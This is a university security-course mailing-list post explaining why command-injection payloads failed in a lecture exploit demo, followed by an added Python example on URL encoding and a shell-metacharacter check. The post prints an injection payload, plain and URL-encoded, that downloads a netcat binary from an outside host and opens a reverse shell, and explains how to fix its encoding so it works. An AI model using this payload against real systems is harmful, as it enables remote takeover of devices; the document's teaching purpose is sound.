[oss] Radu Caragea presenting a practical exploit at today's lecture
Radu Caragea
sinaelgl at gmail.com
Tue Jan 13 22:09:08 EET 2015
On Mon, Jan 12, 2015 at 12:39 PM, Razvan Deaconescu <
razvan.deaconescu at cs.pub.ro> wrote:
> Hi.
>
> At today's lecture, at the beginning of the second hour (7pm), Radu
> Caragea will show us a practical exploit: discovering the vulnerability
> and the practical steps in exploiting it.
Hello. As promised, I looked into why some of the payloads weren't working;
they all had the same problem.
An example of one which didn't work is the following:
; cd /tmp; wget 192.168.1.2/nc_static_mips; chmod +x nc_static_mips;
./nc_static_mips -e /bin/sh 192.168.1.2 12345;
After entering it into Burp Proxy to modify the request it gets encoded
into:
;%20cd%20/tmp;%20wget%20192.168.1.2/nc_static_mips;%20chmod%20+x%20nc_static_mips;%20./nc_static_mips%20-e%20/bin/sh%20192.168.1.2%2012345;
However, as pointed out at [1] "URL encoding normally replaces a space with
a plus (+) sign or with %20.". The reverse also applies.
So the problematic part is actually:
;%20chmod%20+x%20nc_static_mips;
which, upon decoding by the web server, will turn into:
; chmod x nc_static_mips;
So the problem lies in Burp's assumptions about what I entered into that
field. A quick fix is to use python's urllib which is more cautious and
even encodes ";"
>>> import urllib
>>> urllib.quote("; chmod +x nc_static_mips;")
'%3B%20chmod%20%2Bx%20nc_static_mips%3B'
It is sufficient to replace "+" with "%2B" in the initial payload for
everything to work as expected.
[1] http://www.w3schools.com/tags/ref_urlencode.asp
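Worked example (added here; it is not code from the mail above or from the course) of the encoding mismatch the mail describes: an encoder that only turns spaces into %20 leaves a bare "+" on the wire, and a form-decoding web server turns that "+" back into a space. The script contrasts that with Python's cautious quote(), which the mail recommends, and shows what the server ends up seeing in each case. It uses Python 3's urllib.parse (the mail used Python 2's urllib.quote, which gives the same output here); naive_space_only_encode() is a constructed model of the behaviour described, not Burp's actual code, and has_shell_metachars() is an assumed server-side input check, not anything from the mail.

```python
"""Why '+' in a URL-encoded form value gets lost, and how to encode it safely.

Added example; not code from the original mailing-list post.  Uses the Python 3
standard library (urllib.parse).  Sample values are constructed for illustration.
"""
from urllib.parse import quote, unquote_plus


def naive_space_only_encode(value: str) -> str:
    """Constructed model of the encoder the post describes: only spaces become %20.

    '+' and ';' pass through untouched, which is the defect discussed.
    (This models the observed behaviour; it is not Burp's actual code.)
    """
    return value.replace(" ", "%20")


def strict_encode(value: str) -> str:
    """Percent-encode every reserved character, including '+', ';' and '/'.

    quote() never emits a bare '+', so a form decoder cannot mistake one for a
    space.  safe="" additionally encodes '/', which quote() would otherwise keep.
    """
    return quote(value, safe="")


def server_form_decode(encoded: str) -> str:
    """What a web server does with an application/x-www-form-urlencoded value:
    '%XX' escapes are decoded and a bare '+' becomes a space."""
    return unquote_plus(encoded)


def survives_roundtrip(value: str, encoder) -> bool:
    """True if the server receives exactly the value the client meant to send."""
    return server_form_decode(encoder(value)) == value


# Assumed server-side check (not from the post): characters that must never
# reach a shell from a decoded request parameter.
SHELL_METACHARS = frozenset(";|&`$<>\n")


def has_shell_metachars(decoded_value: str) -> bool:
    """Defensive check for a handler: flag a decoded parameter that carries
    shell metacharacters instead of passing it on to a command line."""
    return any(ch in SHELL_METACHARS for ch in decoded_value)


if __name__ == "__main__":
    sample = "; chmod +x nc_static_mips;"      # the fragment quoted in the post
    for name, enc in (("space-only", naive_space_only_encode),
                      ("strict", strict_encode)):
        wire = enc(sample)
        print(f"{name:10} -> {wire}")
        print(f"{'':10}    server sees: {server_form_decode(wire)!r}"
              f"  intact={survives_roundtrip(sample, enc)}")
    print("shell metacharacters present:", has_shell_metachars(sample))
```

Running it shows the space-only encoder producing ";%20chmod%20+x%20nc_static_mips;", which the server decodes to "; chmod  x nc_static_mips;" (the "+" has become a second space), while strict_encode() yields "%3B%20chmod%20%2Bx%20nc_static_mips%3B", the same string the mail obtained from urllib.quote, and that survives the round trip intact. On the defending side, has_shell_metachars() is the kind of check a handler should apply to the decoded value before it goes anywhere near a shell.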